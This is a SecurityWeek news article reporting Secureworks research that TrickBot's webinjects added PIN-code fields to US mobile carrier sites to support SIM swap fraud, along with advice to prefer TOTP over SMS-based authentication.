Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

TrickBot Tricks U.S. Users into Sharing their PIN Codes

The threat actor behind the infamous TrickBot botnet has added new functionality to their malware to request PIN codes from mobile users, Secureworks reports.

The threat actor behind the infamous TrickBot botnet has added new functionality to their malware to request PIN codes from mobile users, Secureworks reports.

Operated by the hacking group previously associated with the Dyre Trojan, TrickBot has been around since October 2016, targeting hundreds of organizations around the world, mostly financial institutions. 

Starting in August 2019, the malware operators modified the webinjects used by TrickBot to target three of the largest mobile carriers in the United States, namely Verizon Wireless (August 5), T-Mobile (August 12), and Sprint (August 19). 

Following the update, when a victim navigates to the website of one of these organizations, TrickBot intercepts the legitimate server response and proxies it through a command and control (C&C) server that injects additional HTML and JavaScript into the page, Secureworks explains.

Thus, as soon as the page is rendered to the victim’s web browser, it includes an additional form field that requests the user’s PIN code.

Code injected into the page also activates TrickBot’s record (rcrd) functionality to create an additional HTTP request containing the victim’s username, password, and PIN, data that is sent to the C&C server. 

The targeting of mobile PIN codes by this threat actor or other groups associated with TrickBot suggests that cybercriminals might be interested in engaging in port-out or SIM swap fraud, Secureworks says. 

“This fraud allows an attacker to assume control of a victim’s telephone number, including all inbound and outbound text and voice communications. The interception of short message service (SMS)-based authentication tokens or password resets is frequently used during account takeover (ATO) fraud,” the security firm points out. 

To stay protected, organizations should use time-based one-time password (TOTP) multi-factor authentication (MFA) instead of SMS MFA. Moreover, they should not use phone numbers as password reset options for accounts. 

Related: TrickBot Gets Computer Locking Capabilities

Related: Fully Operational TrickBot Banking Trojan Targets UK, Australia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Expert Insights

Related Content

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.

Cyberwarfare

Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Malware & Threats

Security researchers are warning of a new wave of malicious NPM and PyPI packages designed to steal user information and download additional payloads.

Cybercrime

Chinese threat actor DragonSpark has been using the SparkRAT open source backdoor in attacks targeting East Asian organizations.

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.